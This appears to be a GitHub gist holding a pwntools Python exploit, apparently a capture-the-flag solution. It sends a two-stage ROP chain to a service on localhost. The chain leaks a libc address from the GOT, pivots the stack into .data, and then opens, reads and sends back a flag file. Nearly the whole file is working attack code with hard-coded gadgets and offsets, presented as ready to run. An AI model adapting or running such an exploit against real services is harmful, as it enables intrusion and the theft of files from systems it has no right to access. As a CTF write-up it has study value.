@otms61
Last active August 29, 2015 14:11
from pwn import *
from struct import pack, unpack
from time import sleep
# Use own libc_read, libc_open, libc_write and libc_binsh address
# Offsets inside the target's libc.so.6 (objdump-style listing in the comments).
# They are specific to that exact libc build and must be re-derived for any
# other target; main() turns them into absolute addresses from the stage-1 leak.
libc_read = 0xdb460 # 000db460 <__read>
libc_open = 0xdafd0 # 000dafd0 <__open>
libc_write = 0xdb4e0 # 000db4e0 <__write>
# $ strings -a -t x libc.so.6 | grep "/bin/sh"
# 1612c4 /bin/sh
libc_binsh = 0x1612c4 # not used by either ROP chain below
# Addresses inside the target binary; they are hard-coded, so the binary is
# assumed to load at a fixed address (non-PIE).
read_plt = 0x80487c0 # 0x80487c0 <read@plt>
read_got = 0x804c010 # 0x804c010 <read@got.plt> - stage 1 leaks this entry to locate libc
send_plt = 0x8048a20 # 08048a20 <send@plt> - stage 1 embeds this value as ASCII hex
buf_file = 0x804c1c0 # scratch buffer for file name and contents, inside 0x0804c000 0x0804d000 rw-p
# ROP gadgets in the binary. popNret = N pops then ret; used to discard call
# arguments between chained calls.
ret = 0x804877f
popret = 0x8048796
pop2ret = 0x8048d93
pop3ret = 0x804926b
pop4ret = 0x804a7dc # stage 1 relies on its last pop being ebp for the leave; ret pivot - confirm with objdump
leaveret = 0x8048a89
# Connects at import time; stage1(), stage2() and main() all use this socket.
t = remote('localhost', 2233, timeout=1000)
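def stage1():
    """Send the stage-1 stager ROP chain over the module-level socket ``t``.

    The chain (1) leaks the resolved read() address back to us with
    send(4, read_got, 4, 0), (2) read()s up to 0x400 bytes of stage 2 into
    .data at 0x804c7c0 and (3) pivots the stack there with leave; ret.
    0x804c7c0 is 0x600 bytes above buf_file, so the file name that stage 2
    later read()s into buf_file cannot clobber this chain.

    Every dword is written as the ASCII hex of its little-endian bytes
    (e.g. 0x8048d93 -> '938d0408'); the service presumably decodes hex
    input before the overflow happens (not verifiable from this file).
    The line ends with CRLF, which the target appears to treat as end of
    input. Uses bytes literals so the same payload works on Python 2 and 3
    pwntools, and joins once instead of repeated ``+=``.
    """
    chain = [
        b'a' * 72,      # padding up to the saved return address
        b'938d0408',    # pop2ret 0x8048d93
        b'a' * 8,       # the two popped dwords (don't care)
        b'08d00408',    # 0x0804d008 hash list address
        # send(4, read_got, 4, 0): leak the GOT entry of read()
        # (assumes lazy binding already resolved it - otherwise the leak
        # is a PLT stub address and the libc base will be wrong)
        b'208a0408',    # send@plt 0x8048a20
        b'dca70408',    # pop4ret: discard the four arguments below
        b'04000000',    #   fd = 4 (client socket)
        b'10c00408',    #   buf = read_got
        b'04000000',    #   len = 4
        b'00000000',    #   flags = 0
        # read(4, 0x804c7c0, 0x400): receive the stage-2 chain into .data
        b'c0870408',    # read@plt 0x80487c0
        b'dca70408',    # pop4ret: its last pop presumably lands in ebp
        b'04000000',    #   fd = 4
        b'c0c70408',    #   buf = 0x804c7c0 (.data)
        b'00040000',    #   size = 0x400
        b'c0c70408',    #   popped into ebp -> new stack for the pivot
        b'898a0408',    # leave; ret: esp = 0x804c7c0, continue with stage 2
        b'\r\n',        # end of line for the target's reader
    ]
    t.send(b''.join(chain))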
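def stage2(open_addr, write_addr):
    """Send the stage-2 ROP chain (read a file, exfiltrate it) over ``t``.

    Executes at 0x804c7c0 after stage 1's leave; ret pivot. ``open_addr``
    and ``write_addr`` are the absolute libc addresses computed from the
    stage-1 leak. The chain performs:

        read(4, buf_file, 0xff)   receive the file name from the socket
        open(buf_file, 4)         open it (flags value kept from the original)
        read(3, buf_file, 64)     read the contents - assumes open() returned fd 3
        write(4, buf_file, 64)    send the contents back over the socket

    open() needs a NUL-terminated path; the read() into buf_file does not
    add one, so the sender must supply it or rely on buf_file being zero
    past the name. The chain ends with a bogus return address, so the
    target crashes after the write - there is no clean exit.
    """
    dwords = [
        0xdeadbeaf,  # popped into ebp by the pivot's leave; never used
        read_plt,    # read(4, buf_file, 0xff)
        pop3ret,     #   discard the three arguments
        4,
        buf_file,
        0xff,
        open_addr,   # open(buf_file, 4)
        pop2ret,     #   discard the two arguments
        buf_file,
        4,
        read_plt,    # read(3, buf_file, 64)
        pop3ret,     #   discard the three arguments
        3,
        buf_file,
        64,
        write_addr,  # write(4, buf_file, 64)
        0xdeadbeaf,  # return address after write(): deliberate crash
        4,
        buf_file,
        64,
    ]
    # One join instead of repeated ``+=``; works on both Python 2 and 3.
    t.sendline(b''.join(pack('<I', d) for d in dwords))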
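def main():
    """Drive the exploit: leak libc, send the stage-2 chain, send the file name, print the file.

    Raises SystemExit if the leaked address cannot be a valid libc pointer.
    """
    print("[*] Stage1: send stager ROP")
    stage1()
    sleep(1)  # let the target run the stager before we wait for the leak
    print("[+] Leak address")
    # recvn() blocks until all 4 bytes have arrived; recv(4) may return
    # fewer and unpack() would then raise struct.error.
    read_addr = unpack('<I', t.recvn(4))[0]
    libc_base = read_addr - libc_read
    # libc is mapped on a page boundary, so a genuine leak minus the known
    # offset of __read must be 0x1000-aligned. Anything else means the libc
    # offsets at the top of the file do not match the target (or the GOT
    # entry was not yet resolved); abort rather than send a bogus chain.
    if libc_base & 0xfff:
        raise SystemExit("[-] read address %s does not give a page-aligned libc base; check the libc offsets" % hex(read_addr))
    open_addr = libc_base + libc_open
    write_addr = libc_base + libc_write
    print(" [+] read address: %s" % hex(read_addr))
    print(" [+] libc base: %s" % hex(libc_base))
    print(" [+] open address: %s" % hex(open_addr))
    print(" [+] write address: %s" % hex(write_addr))
    print("[*] Stage2: send ROP")
    stage2(open_addr, write_addr)
    sleep(1)  # let the pivot happen before the file name arrives
    print("[*] Stage3: send open File name")
    # Explicit NUL terminator: open() needs a C string and the read() in
    # stage 2 does not terminate the buffer itself.
    t.send(b'./goproot/FLAG\x00')
    print("[+] File contents")
    print(t.recv(64))
    t.close()


if __name__ == '__main__':
    main()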